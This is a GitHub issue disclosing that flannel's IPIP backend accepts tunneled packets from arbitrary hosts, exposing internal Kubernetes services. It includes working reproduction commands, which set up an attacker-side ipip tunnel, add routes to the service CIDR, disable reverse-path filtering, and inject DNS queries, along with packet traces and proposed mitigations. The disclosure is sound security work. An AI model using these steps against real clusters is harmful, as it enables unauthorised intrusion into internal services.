When using externally routable node IPs, the IPIP backend accepts tunneled packets from arbitrary remote hosts, which potentially exposes internal cluster services to external attackers in the absence of reverse-path filtering

SpComb commented 6 years ago

The flannel ipip backend creates a single ipip tunnel device with remote any:

9: flannel.ipip@NONE: <NOARP,UP,LOWER_UP> mtu 1480 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/ipip 192.0.2.1 0.0.0.0 promiscuity 0 
    ipip remote any local 192.0.2.1 ttl inherit nopmtudisc addrgenmode eui64

This tunnel device will accept, de-encapsulate and forward any IPIP packets arriving with the correct destination address, regardless of the source address. Given a cluster with nodes using externally routable node IPs, there is nothing to prevent arbitrary external hosts that do not belong to the cluster from sending arbitrary encapsulated packets to any of the cluster hosts.

This is a security issue that risks exposing internal pods/services within the cluster to untrusted external attackers. An external attacker with knowledge of the internal IP addresses in use on the cluster can use this configuration to inject packets using spoofed cluster-internal IPs into the cluster. In configurations lacking reverse-path filtering (RPF) at the host/network level, the external attacker could also use a routable source address to establish TCP connections to services within the cluster.

The default vxlan backend also has a somewhat similar issue with accepting packets on UDP port 8472 from arbitrary sources, but that is somewhat mitigated in the default vxlan backend by requiring the attacker to have knowledge of the flannel.1 VXLAN interface's (randomly-generated?) 48-bit MAC address in order to inject unicast packets... however, injected VXLAN packets with a broadcast destination address may still get processed in some cases (ICMP ping?).

EDIT: edited the title to clarify that only clusters using externally routable node IPs are affected. Clusters using internal node IPs would only accept IPIP packets with a destination address matching the internal node IPs. IPIP packets to any other externally routable local IPs on the same node should get rejected by the kernel.

Expected Behavior

Flannel nodes should only accept ip-ip packets from source addresses belonging to other nodes in the same cluster.

This would raise the bar by requiring the attacking node to have the ability to spoof the external node source addresses in order to inject packets, and actively hijack routing in order to establish connections.

Current Behavior

Flannel nodes accept incoming ip-ip packets from arbitrary source addresses to the local nodeIP, and tunneled packets containing spoofed cluster pod/svc IPs will be forwarded to the internal containers.

Possible Solutions

Create separate ipip interfaces bound to specific sources and leave the default tunl0 interface down?

Create and manage iptables rules to whitelist incoming IP-IP packet sources?

Document the security requirement for limiting external IP-IP traffic to nodes (i.e. only use private/internal/non-globally-routable kubelet --node-ip addresses)?

Steps to Reproduce (for bugs)

Given a node in a kubernetes cluster deployed using networking.podSubnet: 10.32.0.0/16 + networking.serviceSubnet: 10.96.0.0/16, and with flannel deployed using a net-conf.json of { "Network": "10.32.0.0/12", "Backend": { "Type": "ipip" } }:

The node at 192.0.2.1 will have the following relevant parts in its network configuration, with the master node at 192.0.2.0, and a second node at 192.0.2.2:

$ ip addr
4: bond0: <BROADCAST,MULTICAST,MASTER,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 0c:c4:7a:54:0b:e2 brd ff:ff:ff:ff:ff:ff promiscuity 0 
    bond mode balance-tlb ...
    inet 192.0.2.1/31 brd 255.255.255.255 scope global bond0
       valid_lft forever preferred_lft forever
6: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1
    link/ipip 0.0.0.0 brd 0.0.0.0 promiscuity 0 
    ipip remote any local any ttl inherit nopmtudisc 
7: flannel.ipip@NONE: <NOARP,UP,LOWER_UP> mtu 1480 qdisc noqueue state UNKNOWN group default 
    link/ipip 192.0.2.1 brd 0.0.0.0 promiscuity 0 
    ipip remote any local 192.0.2.1 ttl inherit nopmtudisc 
    inet 10.32.2.0/32 scope global flannel.ipip
       valid_lft forever preferred_lft forever
8: cni0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1480 qdisc noqueue state UP group default qlen 1000
    link/ether 0a:58:0a:20:02:01 brd ff:ff:ff:ff:ff:ff promiscuity 0 
    bridge forward_delay 1500 hello_time 200 max_age 2000 ageing_time 30000 stp_state 0 priority 32768 vlan_filtering 0 vlan_protocol 802.1Q 
    inet 10.32.2.1/24 scope global cni0
       valid_lft forever preferred_lft forever
    inet6 fe80::dc57:4fff:fec2:8826/64 scope link 
       valid_lft forever preferred_lft forever
$ ip ro
default via ... dev bond0 onlink 
10.32.0.0/24 via 192.0.2.0 dev flannel.ipip onlink 
10.32.1.0/24 via 192.0.2.2 dev flannel.ipip onlink 
10.32.2.0/24 dev cni0  proto kernel  scope link  src 10.32.2.1

Default case with RPF enabled, using a spoofed cluster-internal source IP

An external attacker at any arbitrary external host with knowledge of:

the node's external IP address
a kube service clusterIP such as 10.96.0.10
a source IP belonging to another node with a valid route on the node's flannel.ipip interface

can then do the following:

$ ip link add ipip-test type ipip local x.y.z.w remote any
$ ip addr add 10.32.1.0 dev ipip-test
$ ip link set ipip-test up
$ sudo ip ro add 10.96.0.0/16 via 192.0.2.1 dev ipip-test onlink
$ ip ro get 10.96.0.10
10.96.0.10 via 192.0.2.1 dev ipip-test  src 10.32.1.0 
    cache 
$ dig @10.96.0.10 kubernetes.default.svc.cluster.local

; <<>> DiG 9.10.3-P4-Ubuntu <<>> @10.96.0.10 kubernetes.default.svc.cluster.local
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

Looking at the tcpdump traces on the external network interfaces across the nodes, the DNS query from the external host to the internal DNS service gets injected into the cluster. In this case, the DNS pod is running on the master node, so the reply goes to the spoofed second node, which returns an ICMP unreachable for the unrecognized UDP response packet.

Attacker node (x.y.z.w)

13:57:04.014935 IP x.y.z.w > 192.0.2.1: IP 10.32.1.0.54886 > 10.96.0.10.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)

node1 (192.0.2.1)

13:57:04.089296 x.y.z.w > 192.0.2.1: 10.32.1.0.54886 > 10.96.0.10.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
13:57:04.089387 192.0.2.1 > 192.0.2.0: 10.32.1.0.54886 > 10.32.0.6.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)

master (192.0.2.0)

13:57:04.086583 192.0.2.1 > 192.0.2.0: 10.32.1.0.54886 > 10.32.0.6.53: 64475+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
13:57:04.087237 192.0.2.0 > 192.0.2.2: 10.32.0.6.53 > 10.32.1.0.54886: 64475* 1/0/0 A 10.96.0.1 (70) (ipip-proto-4)
13:57:04.087425 192.0.2.2 > 192.0.2.0: 10.32.1.0 > 10.32.0.6: ICMP 10.32.1.0 udp port 54886 unreachable, length 106 (ipip-proto-4)

node2 (192.0.2.2)

13:57:04.087746 192.0.2.0 > 192.0.2.2: 10.32.0.6.53 > 10.32.1.0.54886: 64475* 1/0/0 A 10.96.0.1 (70) (ipip-proto-4)
13:57:04.087833 192.0.2.2 > 192.0.2.0: 10.32.1.0 > 10.32.0.6: ICMP 10.32.1.0 udp port 54886 unreachable, length 106 (ipip-proto-4)

Advanced case with RPF disabled

The default case requires spoofing a valid source address within the cluster due to RPF being enabled on the victim node. However, with RPF disabled on the victim node:

$ sysctl net.ipv4.conf.all.rp_filter=0
$ sysctl net.ipv4.conf.flannel/ipip.rp_filter=0

we can get very close to not just injecting spoofed packets into the cluster, but actually connecting to internal cluster services. In this case, the attacker no longer needs any knowledge of the pod CIDRs allocated to the specific nodes:

$ ip link add ipip-test type ipip local x.y.z.w. remote any
$ ip link set ipip-test up
$ ip ro add 10.96.0.0/16 via 192.0.2.1 dev ipip-test onlink
$ ip ro get 10.96.0.10
10.96.0.10 via 192.0.2.1 dev ipip-test  src x.y.z.w 
    cache 
$ dig @10.96.0.10 kubernetes.default.svc.cluster.local

; <<>> DiG 9.10.3-P4-Ubuntu <<>> @10.96.0.10 kubernetes.default.svc.cluster.local
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

Looking at the tcpdump on the victim node, the incoming packet is accepted and forwarded to the DNS pod, and the response packet is actually sent back to the attacking node using the internal 10.96.0.10 cluster-internal source IP:

14:08:57.147777 x.y.z.w > 192.0.2.1: x.y.z.w.57843 > 10.96.0.10.53: 35763+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
14:08:57.147881 192.0.2.1 > 192.0.2.0: 10.32.2.0.57843 > 10.32.0.6.53: 35763+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
14:08:57.148647 192.0.2.0 > 192.0.2.1: 10.32.0.6.53 > 10.32.2.0.57843: 35763* 1/0/0 A 10.96.0.1 (70) (ipip-proto-4)
14:08:57.148700 10.96.0.10.53 > x.y.z.w.57843: 35763* 1/0/0 A 10.96.0.1 (70)

In this case, the upstream router drops the packet with an incorrect source address per its own RPF rules before it reaches the attacking node. However, in some network topologies without any RPF filtering between the attacker and the victim, the external attacker may actually be able to connect to arbitrary internal cluster services, including the default 10.96.0.10 DNS service in order to resolve the service clusterIP addresses.

Context

Nodes connected to the same raw ethernet network are naturally also exposed to similar access from an attacker directly connected to the same ethernet network, but typical cloud provider networks will filter out any traffic using cluster-internal source/destination IP addresses between the cluster nodes and the untrusted attacker node. However, this is not the case for IP-IP tunneled packets...

Your Environment

Flannel version: quay.io/coreos/flannel:v0.10.0-amd64
Backend used (e.g. vxlan or udp): vxlan
Kubernetes version: 1.9.4
Operating System and version: Ubuntu 16.04.3
Cloud provider: packet.net

SpComb commented 6 years ago

For comparison, kube-router configures separate point-to-point IPIP tunnel interfaces, so it's not affected by this.

7: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN mode DEFAULT group default qlen 1
    link/ipip 0.0.0.0 brd 0.0.0.0 promiscuity 0 
    ipip remote any local any ttl inherit nopmtudisc 
8: tun-aaaaaaa@bond0: <POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1460 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/ipip 192.0.2.2 peer 192.0.2.1 promiscuity 0 
    ipip remote 192.0.2.1 local 192.0.2.2 dev bond0 ttl inherit pmtudisc addrgenmode eui64 
9: tun-bbbbbbb@bond0: <POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1460 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/ipip 192.0.2.2 peer 192.0.2.0 promiscuity 0 
    ipip remote 192.0.2.0 local 192.0.2.2 dev bond0 ttl inherit pmtudisc addrgenmode eui64

With the tunl0 interface being down, the incoming IP-IP packets from unconfigured sources get rejected by the kernel with ICMP unreachable:

15:18:11.214722 x.y.z.w > 192.0.2.2: x.y.z.w.52126 > 10.96.0.10.53: 5619+ [1au] A? kubernetes.default.svc.cluster.local. (65) (ipip-proto-4)
15:18:11.214829 192.0.2.2 > x.y.z.w: ICMP 192.0.2.2 protocol 4 port 93 unreachable, length 121

If you bring the tunl0 interface up and disable RPF on it, then does accept the injected traffic.

stale[bot] commented 1 year ago

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

flannel-io / flannel